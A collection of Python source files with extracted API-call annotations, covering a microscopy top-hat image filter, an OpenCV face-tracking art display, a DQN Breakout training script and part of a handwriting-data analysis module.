mf.mo_occ)'], {}), '(0.0 < mf.mo_occ)\n', (2670, 2687), True, 'import numpy as np\n'), ((2697, 2730), 'numpy.count_nonzero', 'np.count_nonzero', (['(1.0 < mf.mo_occ)'], {}), '(1.0 < mf.mo_occ)\n', (2713, 2730), True, 'import numpy as np\n'), ((2781, 2805), 'numpy.nonzero', 'np.nonzero', (['mf.mo_occ[0]'], {}), '(mf.mo_occ[0])\n', (2791, 2805), True, 'import numpy as np\n'), ((2821, 2845), 'numpy.nonzero', 'np.nonzero', (['mf.mo_occ[1]'], {}), '(mf.mo_occ[1])\n', (2831, 2845), True, 'import numpy as np\n'), ((3400, 3464), 'pyscf.symm.label_orb_symm', 'symm.label_orb_symm', (['mol', 'mol.irrep_name', 'mol.symm_orb', 'mo_coeff'], {}), '(mol, mol.irrep_name, mol.symm_orb, mo_coeff)\n', (3419, 3464), False, 'from pyscf import gto, scf, dft, symm, lib\n'), ((4006, 4056), 'numpy.array', 'np.array', (["[(['A'] * c.shape[1]) for c in mo_coeff]"], {}), "([(['A'] * c.shape[1]) for c in mo_coeff])\n", (4014, 4056), True, 'import numpy as np\n'), ((7184, 7209), 'numpy.sum', 'np.sum', (['rdm1_atom'], {'axis': '(0)'}), '(rdm1_atom, axis=0)\n', (7190, 7209), True, 'import numpy as np\n'), ((7364, 7389), 'numpy.sum', 'np.sum', (['rdm1_atom'], {'axis': '(0)'}), '(rdm1_atom, axis=0)\n', (7370, 7389), True, 'import numpy as np\n'), ((2206, 2223), 'numpy.abs', 'np.abs', (['mo_occ[0]'], {}), '(mo_occ[0])\n', (2212, 2223), True, 'import numpy as np\n'), ((2243, 2260), 'numpy.abs', 'np.abs', (['mo_occ[1]'], {}), '(mo_occ[1])\n', (2249, 2260), True, 'import numpy as np\n'), ((3519, 3554), 'numpy.array', 'np.array', (["(['A'] * mo_coeff.shape[1])"], {}), "(['A'] * mo_coeff.shape[1])\n", (3527, 3554), True, 'import numpy as np\n'), ((3766, 3816), 'numpy.array', 'np.array', (["[(['A'] * c.shape[1]) for c in mo_coeff]"], {}), "([(['A'] * c.shape[1]) for c in mo_coeff])\n", (3774, 3816), True, 'import numpy as np\n'), ((3882, 3939), 'pyscf.symm.label_orb_symm', 'symm.label_orb_symm', (['mol', 'mol.irrep_name', 'mol.symm_orb', 'c'], {}), '(mol, mol.irrep_name, mol.symm_orb, c)\n', (3901, 3939), False, 'from pyscf import gto, scf, dft, symm, lib\n'), ((3634, 3691), 'pyscf.symm.label_orb_symm', 'symm.label_orb_symm', (['mol', 'mol.irrep_name', 'mol.symm_orb', 'c'], {}), '(mol, mol.irrep_name, mol.symm_orb, c)\n', (3653, 3691), False, 'from pyscf import gto, scf, dft, symm, lib\n'), ((5500, 5517), 'numpy.abs', 'np.abs', (['occ_no[0]'], {}), '(occ_no[0])\n', (5506, 5517), True, 'import numpy as np\n'), ((5549, 5566), 'numpy.abs', 'np.abs', (['occ_no[1]'], {}), '(occ_no[1])\n', (5555, 5566), True, 'import numpy as np\n'), ((1764, 1789), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (1779, 1789), False, 'import os\n'), ((5375, 5392), 'numpy.abs', 'np.abs', (['occ_no[0]'], {}), '(occ_no[0])\n', (5381, 5392), True, 'import numpy as np\n'), ((5429, 5446), 'numpy.abs', 'np.abs', (['occ_no[1]'], {}), '(occ_no[1])\n', (5435, 5446), True, 'import numpy as np\n')]
|
import numpy as np
from ._base import FilterAlgorithmBase
class WhiteTophat(FilterAlgorithmBase):
"""
Performs "white top hat" filtering of an image to enhance spots. "White top hat filtering" finds spots that are both
smaller and brighter than their surroundings.
See Also
--------
https://en.wikipedia.org/wiki/Top-hat_transform
"""
def __init__(self, disk_size, **kwargs):
"""Instance of a white top hat morphological masking filter which masks objects larger than `disk_size`
Parameters
----------
disk_size : int
diameter of the morphological masking disk in pixels
"""
self.disk_size = disk_size
@classmethod
def add_arguments(cls, group_parser):
group_parser.add_argument(
"--disk-size", default=15, type=int, help="diameter of morphological masking disk in pixels")
def filter(self, stack) -> None:
"""Perform in-place filtering of an image stack and all contained aux images
Parameters
----------
stack : starfish.Stack
Stack to be filtered
"""
from scipy.ndimage.filters import maximum_filter, minimum_filter
from skimage.morphology import disk
def white_tophat(image):
if image.dtype.kind != "u":
raise TypeError("images should be stored in an unsigned integer array")
structuring_element = disk(self.disk_size)
min_filtered = minimum_filter(image, footprint=structuring_element)
max_filtered = maximum_filter(min_filtered, footprint=structuring_element)
filtered_image = image - np.minimum(image, max_filtered)
return filtered_image
stack.image.apply(white_tophat)
# apply to aux dict too.
for auxiliary_image in stack.auxiliary_images.values():
auxiliary_image.apply(white_tophat)
|
[
"numpy.minimum",
"skimage.morphology.disk",
"scipy.ndimage.filters.maximum_filter",
"scipy.ndimage.filters.minimum_filter"
] |
[((1454, 1474), 'skimage.morphology.disk', 'disk', (['self.disk_size'], {}), '(self.disk_size)\n', (1458, 1474), False, 'from skimage.morphology import disk\n'), ((1502, 1554), 'scipy.ndimage.filters.minimum_filter', 'minimum_filter', (['image'], {'footprint': 'structuring_element'}), '(image, footprint=structuring_element)\n', (1516, 1554), False, 'from scipy.ndimage.filters import maximum_filter, minimum_filter\n'), ((1582, 1641), 'scipy.ndimage.filters.maximum_filter', 'maximum_filter', (['min_filtered'], {'footprint': 'structuring_element'}), '(min_filtered, footprint=structuring_element)\n', (1596, 1641), False, 'from scipy.ndimage.filters import maximum_filter, minimum_filter\n'), ((1679, 1710), 'numpy.minimum', 'np.minimum', (['image', 'max_filtered'], {}), '(image, max_filtered)\n', (1689, 1710), True, 'import numpy as np\n')]
|
import datetime
import cv2
import numpy as np
from artsci2019.lib.frame_checker import FrameChecker
from artsci2019.lib.util import scale_frame, scale_point, is_in_frame
from artsci2019.lib.face_recog import get_faces
from artsci2019.lib.sound import SoundPlayer
def draw_checked_frame(frame, checked_frame, factor):
green = (100, 255, 100)
red = (100, 100, 255)
eye_line_color = green if checked_frame.width_ok else red
cv2.line(frame,
scale_point(checked_frame.left_eye, factor),
scale_point(checked_frame.right_eye, factor),
eye_line_color,
thickness=2)
centre_line_color = green if checked_frame.centre_ok else red
cv2.line(frame,
scale_point(checked_frame.centre, factor),
scale_point(checked_frame.centre_target, factor),
centre_line_color,
thickness=4)
height_line_color = green if checked_frame.height_ok else red
cv2.line(frame,
scale_point(checked_frame.h_min_point, factor),
scale_point(checked_frame.h_max_point, factor),
height_line_color,
thickness=2)
def draw_triangles(frame, checked_frame, factor):
f_h, f_w, _ = checked_frame.recognized_frame.frame.shape
# prep delaunay
rect = (0, 0, f_w, f_h)
subdiv = cv2.Subdiv2D(rect)
for lm in checked_frame.recognized_frame.face_landmarks:
if is_in_frame(f_w, f_h, lm):
subdiv.insert(lm)
print("triangles: {}".format(len(subdiv.getTriangleList())))
for t in subdiv.getTriangleList():
t = np.reshape(t, (3, 2)).astype(np.int32)
pt1 = scale_point(tuple(t[0]), factor)
pt2 = scale_point(tuple(t[1]), factor)
pt3 = scale_point(tuple(t[2]), factor)
cv2.line(frame, pt1, pt2, (255, 255, 255), 1, 8, 0)
cv2.line(frame, pt2, pt3, (255, 255, 255), 1, 8, 0)
cv2.line(frame, pt3, pt1, (255, 255, 255), 1, 8, 0)
def my_get_frame(video_capture, rotate):
# get a single frame
rval, frame = video_capture.read()
if rotate:
frame = cv2.transpose(frame)
frame = cv2.flip(frame, flipCode=1)
return rval, frame
class InteractiveDisplay:
def __init__(self, camera_number, rotate, fullscreen, processing_backend):
self.camera_number = camera_number
self.rotate = rotate
self.fullscreen = fullscreen
self.debug_scaling = 1/2
if fullscreen:
self.debug_scaling = 1
self.scaling_factor = 4
self.preview_window = "preview"
self.genimage_window = "genimage"
self.genimage = None
self.video_capture = None
self.collected_frames = []
self.pb = processing_backend
self.current_checked_frames = []
self.checkpoint_time = datetime.datetime.now() + datetime.timedelta(seconds=10)
self.frame_checker = None
self.sound_player = SoundPlayer("bing.wav")
def init(self):
# initialize window
cv2.namedWindow(self.preview_window, cv2.WINDOW_NORMAL)
cv2.namedWindow(self.genimage_window, cv2.WINDOW_NORMAL) # WINDOW_NORMAL required for fullscreen to work
if self.fullscreen:
cv2.setWindowProperty(self.genimage_window, cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)
# get webcam
self.video_capture = cv2.VideoCapture(self.camera_number)
self.video_capture.set(3, 1920)
self.video_capture.set(4, 1080)
rval = False
frame = None
if self.video_capture.isOpened(): # try to get the first frame
rval, frame = my_get_frame(self.video_capture, self.rotate)
if frame is not None:
self.genimage = scale_frame(frame, self.debug_scaling)
cv2.imshow(self.genimage_window, self.genimage)
if self.rotate:
self.frame_checker = FrameChecker(1080, 1920)
else:
self.frame_checker = FrameChecker(1920, 1080)
return rval
def teardown(self):
cv2.destroyWindow(self.preview_window)
cv2.destroyWindow(self.genimage_window)
self.video_capture.release()
def portrait_update(self, checked_frames):
current_time = datetime.datetime.now()
if current_time < self.checkpoint_time:
print("too early")
return # too early for an update
# update portrait
ok_frames = [cf.recognized_frame
for cf in checked_frames
if cf.all_ok]
changed = False
if ok_frames:
print("Updating")
self.sound_player.play()
changed = self.pb.update(ok_frames)
if changed:
print("Updated")
portrait_frame = self.pb.get_portrait()
f = scale_frame(portrait_frame, self.debug_scaling)
self.genimage = f
cv2.imshow(self.genimage_window, self.genimage)
self.checkpoint_time = current_time + datetime.timedelta(seconds=10)
return changed
def loop_update(self, frame):
frame = scale_frame(frame, self.debug_scaling)
new_preview = frame
new_genimage = self.genimage
current_time = datetime.datetime.now()
if current_time > self.checkpoint_time and self.current_checked_frames:
# draw face lines
score = max([cf.total_score for cf in self.current_checked_frames])
for cf in self.current_checked_frames:
print("Score: {}".format(cf.total_score))
new_genimage = cv2.addWeighted(self.genimage, 1 - score, frame, score, 0)
# draw_triangles(new_genimage, self.current_checked_frames[0], self.debug_scaling)
# draw_triangles(new_preview, self.current_checked_frames[0], self.debug_scaling)
if score > 0.5:
print("YO")
draw_triangles(new_genimage, self.current_checked_frames[0], self.debug_scaling)
# Display the resulting image
cv2.imshow(self.preview_window, new_preview)
cv2.imshow(self.genimage_window, new_genimage)
cv2.waitKey(50)
changed = self.portrait_update(self.current_checked_frames)
def start(self):
process_this_frame = True
rval = True
while rval:
# get a single frame
rval, frame = my_get_frame(self.video_capture, self.rotate)
# TODO drop frames while processing
# get the faces
if process_this_frame:
rfs = get_faces(frame, self.scaling_factor)
self.current_checked_frames = [self.frame_checker.check(rf) for rf in rfs]
process_this_frame = not process_this_frame
self.loop_update(frame)
# exit on ESC
key = cv2.waitKey(20)
if key == 113: # exit on q
break
|
[
"artsci2019.lib.util.scale_point",
"cv2.transpose",
"artsci2019.lib.sound.SoundPlayer",
"cv2.imshow",
"datetime.timedelta",
"artsci2019.lib.frame_checker.FrameChecker",
"numpy.reshape",
"cv2.line",
"cv2.addWeighted",
"cv2.waitKey",
"cv2.Subdiv2D",
"cv2.namedWindow",
"artsci2019.lib.util.is_in_frame",
"cv2.setWindowProperty",
"cv2.flip",
"cv2.destroyWindow",
"artsci2019.lib.face_recog.get_faces",
"datetime.datetime.now",
"cv2.VideoCapture",
"artsci2019.lib.util.scale_frame"
] |
[((1334, 1352), 'cv2.Subdiv2D', 'cv2.Subdiv2D', (['rect'], {}), '(rect)\n', (1346, 1352), False, 'import cv2\n'), ((470, 513), 'artsci2019.lib.util.scale_point', 'scale_point', (['checked_frame.left_eye', 'factor'], {}), '(checked_frame.left_eye, factor)\n', (481, 513), False, 'from artsci2019.lib.util import scale_frame, scale_point, is_in_frame\n'), ((528, 572), 'artsci2019.lib.util.scale_point', 'scale_point', (['checked_frame.right_eye', 'factor'], {}), '(checked_frame.right_eye, factor)\n', (539, 572), False, 'from artsci2019.lib.util import scale_frame, scale_point, is_in_frame\n'), ((729, 770), 'artsci2019.lib.util.scale_point', 'scale_point', (['checked_frame.centre', 'factor'], {}), '(checked_frame.centre, factor)\n', (740, 770), False, 'from artsci2019.lib.util import scale_frame, scale_point, is_in_frame\n'), ((785, 833), 'artsci2019.lib.util.scale_point', 'scale_point', (['checked_frame.centre_target', 'factor'], {}), '(checked_frame.centre_target, factor)\n', (796, 833), False, 'from artsci2019.lib.util import scale_frame, scale_point, is_in_frame\n'), ((993, 1039), 'artsci2019.lib.util.scale_point', 'scale_point', (['checked_frame.h_min_point', 'factor'], {}), '(checked_frame.h_min_point, factor)\n', (1004, 1039), False, 'from artsci2019.lib.util import scale_frame, scale_point, is_in_frame\n'), ((1054, 1100), 'artsci2019.lib.util.scale_point', 'scale_point', (['checked_frame.h_max_point', 'factor'], {}), '(checked_frame.h_max_point, factor)\n', (1065, 1100), False, 'from artsci2019.lib.util import scale_frame, scale_point, is_in_frame\n'), ((1425, 1450), 'artsci2019.lib.util.is_in_frame', 'is_in_frame', (['f_w', 'f_h', 'lm'], {}), '(f_w, f_h, lm)\n', (1436, 1450), False, 'from artsci2019.lib.util import scale_frame, scale_point, is_in_frame\n'), ((1786, 1837), 'cv2.line', 'cv2.line', (['frame', 'pt1', 'pt2', '(255, 255, 255)', '(1)', '(8)', '(0)'], {}), '(frame, pt1, pt2, (255, 255, 255), 1, 8, 0)\n', (1794, 1837), False, 'import cv2\n'), ((1846, 1897), 'cv2.line', 'cv2.line', (['frame', 'pt2', 'pt3', '(255, 255, 255)', '(1)', '(8)', '(0)'], {}), '(frame, pt2, pt3, (255, 255, 255), 1, 8, 0)\n', (1854, 1897), False, 'import cv2\n'), ((1906, 1957), 'cv2.line', 'cv2.line', (['frame', 'pt3', 'pt1', '(255, 255, 255)', '(1)', '(8)', '(0)'], {}), '(frame, pt3, pt1, (255, 255, 255), 1, 8, 0)\n', (1914, 1957), False, 'import cv2\n'), ((2097, 2117), 'cv2.transpose', 'cv2.transpose', (['frame'], {}), '(frame)\n', (2110, 2117), False, 'import cv2\n'), ((2134, 2161), 'cv2.flip', 'cv2.flip', (['frame'], {'flipCode': '(1)'}), '(frame, flipCode=1)\n', (2142, 2161), False, 'import cv2\n'), ((2933, 2956), 'artsci2019.lib.sound.SoundPlayer', 'SoundPlayer', (['"""bing.wav"""'], {}), "('bing.wav')\n", (2944, 2956), False, 'from artsci2019.lib.sound import SoundPlayer\n'), ((3014, 3069), 'cv2.namedWindow', 'cv2.namedWindow', (['self.preview_window', 'cv2.WINDOW_NORMAL'], {}), '(self.preview_window, cv2.WINDOW_NORMAL)\n', (3029, 3069), False, 'import cv2\n'), ((3078, 3134), 'cv2.namedWindow', 'cv2.namedWindow', (['self.genimage_window', 'cv2.WINDOW_NORMAL'], {}), '(self.genimage_window, cv2.WINDOW_NORMAL)\n', (3093, 3134), False, 'import cv2\n'), ((3367, 3403), 'cv2.VideoCapture', 'cv2.VideoCapture', (['self.camera_number'], {}), '(self.camera_number)\n', (3383, 3403), False, 'import cv2\n'), ((4039, 4077), 'cv2.destroyWindow', 'cv2.destroyWindow', (['self.preview_window'], {}), '(self.preview_window)\n', (4056, 4077), False, 'import cv2\n'), ((4086, 4125), 'cv2.destroyWindow', 'cv2.destroyWindow', (['self.genimage_window'], {}), '(self.genimage_window)\n', (4103, 4125), False, 'import cv2\n'), ((4235, 4258), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (4256, 4258), False, 'import datetime\n'), ((5103, 5141), 'artsci2019.lib.util.scale_frame', 'scale_frame', (['frame', 'self.debug_scaling'], {}), '(frame, self.debug_scaling)\n', (5114, 5141), False, 'from artsci2019.lib.util import scale_frame, scale_point, is_in_frame\n'), ((5231, 5254), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (5252, 5254), False, 'import datetime\n'), ((6029, 6073), 'cv2.imshow', 'cv2.imshow', (['self.preview_window', 'new_preview'], {}), '(self.preview_window, new_preview)\n', (6039, 6073), False, 'import cv2\n'), ((6082, 6128), 'cv2.imshow', 'cv2.imshow', (['self.genimage_window', 'new_genimage'], {}), '(self.genimage_window, new_genimage)\n', (6092, 6128), False, 'import cv2\n'), ((6137, 6152), 'cv2.waitKey', 'cv2.waitKey', (['(50)'], {}), '(50)\n', (6148, 6152), False, 'import cv2\n'), ((2814, 2837), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (2835, 2837), False, 'import datetime\n'), ((2840, 2870), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(10)'}), '(seconds=10)\n', (2858, 2870), False, 'import datetime\n'), ((3224, 3320), 'cv2.setWindowProperty', 'cv2.setWindowProperty', (['self.genimage_window', 'cv2.WND_PROP_FULLSCREEN', 'cv2.WINDOW_FULLSCREEN'], {}), '(self.genimage_window, cv2.WND_PROP_FULLSCREEN, cv2.\n WINDOW_FULLSCREEN)\n', (3245, 3320), False, 'import cv2\n'), ((3731, 3769), 'artsci2019.lib.util.scale_frame', 'scale_frame', (['frame', 'self.debug_scaling'], {}), '(frame, self.debug_scaling)\n', (3742, 3769), False, 'from artsci2019.lib.util import scale_frame, scale_point, is_in_frame\n'), ((3782, 3829), 'cv2.imshow', 'cv2.imshow', (['self.genimage_window', 'self.genimage'], {}), '(self.genimage_window, self.genimage)\n', (3792, 3829), False, 'import cv2\n'), ((3888, 3912), 'artsci2019.lib.frame_checker.FrameChecker', 'FrameChecker', (['(1080)', '(1920)'], {}), '(1080, 1920)\n', (3900, 3912), False, 'from artsci2019.lib.frame_checker import FrameChecker\n'), ((3960, 3984), 'artsci2019.lib.frame_checker.FrameChecker', 'FrameChecker', (['(1920)', '(1080)'], {}), '(1920, 1080)\n', (3972, 3984), False, 'from artsci2019.lib.frame_checker import FrameChecker\n'), ((4810, 4857), 'artsci2019.lib.util.scale_frame', 'scale_frame', (['portrait_frame', 'self.debug_scaling'], {}), '(portrait_frame, self.debug_scaling)\n', (4821, 4857), False, 'from artsci2019.lib.util import scale_frame, scale_point, is_in_frame\n'), ((4900, 4947), 'cv2.imshow', 'cv2.imshow', (['self.genimage_window', 'self.genimage'], {}), '(self.genimage_window, self.genimage)\n', (4910, 4947), False, 'import cv2\n'), ((5581, 5639), 'cv2.addWeighted', 'cv2.addWeighted', (['self.genimage', '(1 - score)', 'frame', 'score', '(0)'], {}), '(self.genimage, 1 - score, frame, score, 0)\n', (5596, 5639), False, 'import cv2\n'), ((6826, 6841), 'cv2.waitKey', 'cv2.waitKey', (['(20)'], {}), '(20)\n', (6837, 6841), False, 'import cv2\n'), ((1598, 1619), 'numpy.reshape', 'np.reshape', (['t', '(3, 2)'], {}), '(t, (3, 2))\n', (1608, 1619), True, 'import numpy as np\n'), ((4998, 5028), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(10)'}), '(seconds=10)\n', (5016, 5028), False, 'import datetime\n'), ((6558, 6595), 'artsci2019.lib.face_recog.get_faces', 'get_faces', (['frame', 'self.scaling_factor'], {}), '(frame, self.scaling_factor)\n', (6567, 6595), False, 'from artsci2019.lib.face_recog import get_faces\n')]
|
import gym
from dqn_tf import DeepQNetwork, Agent
import numpy as np
from gym import wrappers
def preprocess(observation):
return np.mean(observation[30:, :], axis=2).reshape(180, 160, 1)
def stack_frames(stacked_frames, frame, buffer_size):
if stacked_frames is None:
stacked_frames = np.zeros((buffer_size, *frame.reshape))
for idx, _ in enumerate(stacked_frame):
stacked_frames[idx, :] = frame[0]
else:
stacked_frames[0:buffer_size-1, :] = stacked_frames[1:, :]
stacked_frames[buffer_size-1, :] = frame[0]
stacked_frames = stacked_frames.reshape(1, *frames.shape[0:2], buffer_size)
return stacked_frames
if __name__ == "__main__":
env = gym.make("Breakout-v0")
load_checkpoint = False
agent = Agent(gamma=0.99, epsilon=1.0, alpha=0.00025, input_dims=(180, 160, 4),
n_actions=3, mem_size=3000, batch_size=32)
if load_checkpoint:
agent.load_models()
scores = []
numGames = 200
stack_size = 400
score = 0
while agent.mem_cntr < 3000:
done = False
observation = env.reset()
observation = preprocess(observation)
stacked_frames = None
observation = stack_frames(stacked_frames, observation, stack_size)
while not done:
action = np.random.choice([0, 1, 2])
action += 1
observation_, reward, done, info = env.step(action)
observation_ = stack_frames(stacked_frames, preprocess(observation_),
stack_size)
action -= 1
agent.store_transition(observation, action,
reward, observation_, int(done))
observation = observation_
print("Done with random gameplay, game on")
for i in range(numGames):
done = False
if i % 10 == 0 and i > 0:
avg_score = np.mean(score[max(0, i-10):(i+1)])
print('episode', i, 'score', score, 'average_score %.3f' % avg_score,
'epsilon %.3f' % agent.epsilon)
agent.save_models()
else:
print('episode: ', i, 'score ', score)
observation = env.reset()
observation = preprocess(observation)
stacked_frames = None
observation = stack_frames(stacked_frames, observation, stack_size)
while not done:
action = agent.choose_action(observation)
action += 1
observation_, reward, done, info = env.step(action)
observation_ = stack_frames(stacked_frames, preprocess(observation_),
stack_size)
action -= 1
agent.store_transition(observation, action,
reward, observation_, int(done))
observation = observation_
agent.learn()
score += reward
scores.append(score)
|
[
"numpy.mean",
"numpy.random.choice",
"numpy.zeros",
"dqn_tf.Agent",
"gym.make"
] |
[((717, 740), 'gym.make', 'gym.make', (['"""Breakout-v0"""'], {}), "('Breakout-v0')\n", (725, 740), False, 'import gym\n'), ((781, 899), 'dqn_tf.Agent', 'Agent', ([], {'gamma': '(0.99)', 'epsilon': '(1.0)', 'alpha': '(0.00025)', 'input_dims': '(180, 160, 4)', 'n_actions': '(3)', 'mem_size': '(3000)', 'batch_size': '(32)'}), '(gamma=0.99, epsilon=1.0, alpha=0.00025, input_dims=(180, 160, 4),\n n_actions=3, mem_size=3000, batch_size=32)\n', (786, 899), False, 'from dqn_tf import DeepQNetwork, Agent\n'), ((306, 345), 'numpy.zeros', 'np.zeros', (['(buffer_size, *frame.reshape)'], {}), '((buffer_size, *frame.reshape))\n', (314, 345), True, 'import numpy as np\n'), ((136, 172), 'numpy.mean', 'np.mean', (['observation[30:, :]'], {'axis': '(2)'}), '(observation[30:, :], axis=2)\n', (143, 172), True, 'import numpy as np\n'), ((1322, 1349), 'numpy.random.choice', 'np.random.choice', (['[0, 1, 2]'], {}), '([0, 1, 2])\n', (1338, 1349), True, 'import numpy as np\n')]
|
"""Data analyzation metrics
Each algorithm works on a set of handwritings. They have to be applied like
this:
>>> import hwrt.data_analyzation_metrics
>>> from hwrt.handwritten_data import HandwrittenData
>>> data_json = '[[{"time": 123, "x": 45, "y": 67}]]'
>>> a = [{'is_in_testset': 0,
... 'formula_id': "31L",
... 'handwriting': HandwrittenData(raw_data_id=2953, raw_data_json=data_json),
... 'formula_in_latex': 'A',
... 'id': "2953L"},
... {'is_in_testset': 0,
... 'formula_id': "31L",
... 'handwriting': HandwrittenData(raw_data_id=4037, raw_data_json=data_json),
... 'formula_in_latex': 'A',
... 'id': "4037L"},
... {'is_in_testset': 0,
... 'formula_id': "31L",
... 'handwriting': HandwrittenData(raw_data_id=4056, raw_data_json=data_json),
... 'formula_in_latex': 'A',
... 'id': "4056L"}]
>>> creator_metric = Creator('creator.csv')
>>> creator_metric(a)
100%
"""
# Core Library modules
import logging
import math
import os
import sys
import time
from collections import defaultdict
# Third party modules
import numpy
# Local modules
# HandwrittenData and preprocessing are needed because of pickle
from . import handwritten_data # pylint: disable=W0611
from . import preprocessing # pylint: disable=W0611
from . import utils
logger = logging.getLogger(__name__)
sys.modules["hwrt.HandwrittenData"] = handwritten_data
def get_metrics(metrics_description):
"""Get metrics from a list of dictionaries. """
return utils.get_objectlist(
metrics_description,
config_key="data_analyzation_plugins",
module=sys.modules[__name__],
)
# Helper functions that are useful for some metrics
def prepare_file(filename):
"""Truncate the file and return the filename."""
directory = os.path.join(utils.get_project_root(), "analyzation/")
if not os.path.exists(directory):
os.makedirs(directory)
workfilename = os.path.join(directory, filename)
with open(workfilename, "w") as fp:
pass # Truncate the file
return workfilename
def sort_by_formula_id(raw_datasets):
"""
Sort a list of formulas by `id`, where `id` represents the accepted
formula id.
Parameters
----------
raw_datasets : list of dictionaries
A list of raw datasets.
Examples
--------
The parameter `raw_datasets` has to be of the format
>>> from hwrt.handwritten_data import HandwrittenData
>>> data = '[[{"time": 123, "x": 45, "y": 67}]]'
>>> rd = [{'is_in_testset': 0,
... 'formula_id': 31,
... 'handwriting': HandwrittenData(raw_data_id=2953, raw_data_json=data),
... 'formula_in_latex': 'A',
... 'id': 2953},
... {'is_in_testset': 0,
... 'formula_id': 31,
... 'handwriting': HandwrittenData(raw_data_id=4037, raw_data_json=data),
... 'formula_in_latex': 'A',
... 'id': 4037},
... {'is_in_testset': 0,
... 'formula_id': 31,
... 'handwriting': HandwrittenData(raw_data_id=4056, raw_data_json=data),
... 'formula_in_latex': 'A',
... 'id': 4056}]
>>> _ = sort_by_formula_id(rd)
"""
by_formula_id = defaultdict(list)
for el in raw_datasets:
by_formula_id[el["handwriting"].formula_id].append(el["handwriting"])
return by_formula_id
# Only data analyzation calculation classes follow
# Every class must have a __str__, __repr__ and __call__ function where
# __call__ must take exactly one argument of type list of dictionaries
# Every class must have a constructor which takes the filename as a parameter.
# This filename has to be used to write the evaluation results
# (preferably in CSV format) to this file.
# prepare_file should be applied to every file in the constructor
class Creator:
"""Analyze who created most of the data."""
def __init__(self, filename="creator.csv"):
self.filename = prepare_file(filename)
def __repr__(self):
return "AnalyzeCreator(%s)" % self.filename
def __str__(self):
return "AnalyzeCreator(%s)" % self.filename
def __call__(self, raw_datasets):
with open(self.filename, "a") as write_file:
write_file.write("creatorid,nr of recordings\n") # heading
print_data = defaultdict(int)
start_time = time.time()
for i, raw_dataset in enumerate(raw_datasets):
if i % 100 == 0 and i > 0:
utils.print_status(len(raw_datasets), i, start_time)
print_data[raw_dataset["handwriting"].user_id] += 1
print("100%")
# Sort the data by highest value, descending
print_data = sorted(print_data.items(), key=lambda n: n[1], reverse=True)
# Write data to file
write_file.write(f"total,{sum(value for _, value in print_data)}\n")
for userid, value in print_data:
write_file.write(f"{userid},{value}\n")
class InstrokeSpeed:
"""Analyze how fast the points were in pixel/ms."""
def __init__(self, filename="instroke_speed.csv"):
self.filename = prepare_file(filename)
def __repr__(self):
return "InstrokeSpeed(%s)" % self.filename
def __str__(self):
return "InstrokeSpeed(%s)" % self.filename
def __call__(self, raw_datasets):
with open(self.filename, "a") as write_file:
write_file.write("speed\n") # heading
print_data = []
start_time = time.time()
for i, raw_dataset in enumerate(raw_datasets):
if i % 100 == 0 and i > 0:
utils.print_status(len(raw_datasets), i, start_time)
pointlist = raw_dataset["handwriting"].get_sorted_pointlist()
for stroke in pointlist:
for last_point, point in zip(stroke, stroke[1:]):
space_dist = math.hypot(
last_point["x"] - point["x"], last_point["y"] - point["y"]
)
time_delta = point["time"] - last_point["time"]
if time_delta == 0:
continue
print_data.append(space_dist / time_delta)
print("100%")
# Sort the data by highest value, descending
print_data = sorted(print_data, reverse=True)
# Write data to file
for value in print_data:
write_file.write("%0.8f\n" % (value))
logger.info("instroke speed mean: %0.8f", numpy.mean(print_data))
logger.info("instroke speed std: %0.8f", numpy.std(print_data))
class InterStrokeDistance:
"""Analyze how much distance in px is between strokes."""
def __init__(self, filename="dist_between_strokes.csv"):
self.filename = prepare_file(filename)
def __repr__(self):
return "InterStrokeDistance(%s)" % self.filename
def __str__(self):
return "InterStrokeDistance(%s)" % self.filename
def __call__(self, raw_datasets):
with open(self.filename, "a") as write_file:
write_file.write("speed\n") # heading
print_data = []
start_time = time.time()
for i, raw_dataset in enumerate(raw_datasets):
if i % 100 == 0 and i > 0:
utils.print_status(len(raw_datasets), i, start_time)
pointlist = raw_dataset["handwriting"].get_sorted_pointlist()
for last_stroke, stroke in zip(pointlist, pointlist[1:]):
point1 = last_stroke[-1]
point2 = stroke[0]
space_dist = math.hypot(
point1["x"] - point2["x"], point1["y"] - point2["y"]
)
print_data.append(space_dist)
print("100%")
# Sort the data by highest value, descending
print_data = sorted(print_data, reverse=True)
# Write data to file
for value in print_data:
write_file.write("%0.8f\n" % (value))
logger.info("dist_between_strokes mean:\t%0.8fpx", numpy.mean(print_data))
logger.info("dist_between_strokes std: \t%0.8fpx", numpy.std(print_data))
class TimeBetweenPointsAndStrokes:
"""For each recording: Store the average time between controll points of
one stroke / controll points of two different strokes.
"""
def __init__(
self,
filename="average_time_between_points.txt",
filename_strokes="average_time_between_strokes.txt",
):
self.filename_points = prepare_file(filename)
self.filename_strokes = prepare_file(filename_strokes)
def __repr__(self):
return "TimeBetweenPointsAndStrokes({points}, {strokes})".format(
points=self.filename_points,
strokes=self.filename_strokes,
)
__str__ = __repr__
def __call__(self, raw_datasets):
average_between_points = open(self.filename_points, "a") # noqa
average_between_strokes = open(self.filename_strokes, "a") # noqa
start_time = time.time()
for i, raw_dataset in enumerate(raw_datasets):
if i % 100 == 0 and i > 0:
utils.print_status(len(raw_datasets), i, start_time)
# Do the work
times_between_points, times_between_strokes = [], []
last_stroke_end = None
for stroke in raw_dataset["handwriting"].get_sorted_pointlist():
if last_stroke_end is not None:
times_between_strokes.append(stroke[-1]["time"] - last_stroke_end)
last_stroke_end = stroke[-1]["time"]
for point1, point2 in zip(stroke, stroke[1:]):
delta = point2["time"] - point1["time"]
times_between_points.append(delta)
# The recording might only have one point
if len(times_between_points) > 0:
tmp = times_between_points
average_between_points.write("%0.2f\n" % numpy.average(tmp))
# The recording might only have one stroke
if len(times_between_strokes) > 0:
tmp = times_between_strokes
average_between_strokes.write("%0.2f\n" % numpy.average(tmp))
print("100%")
average_between_points.close()
average_between_strokes.close()
class AnalyzeErrors:
"""Analyze the number of errors in the dataset."""
def __init__(self, filename="errors.txt", time_max_threshold=30 * 1000):
self.filename = prepare_file(filename)
self.time_max_threshold = time_max_threshold # in ms
self.dot_symbols = [
"i",
"j",
r"\cdot",
r"\div",
"\\because",
"\\therefore",
] # TODO: Use the tags!
def __repr__(self):
return "AnalyzeErrors"
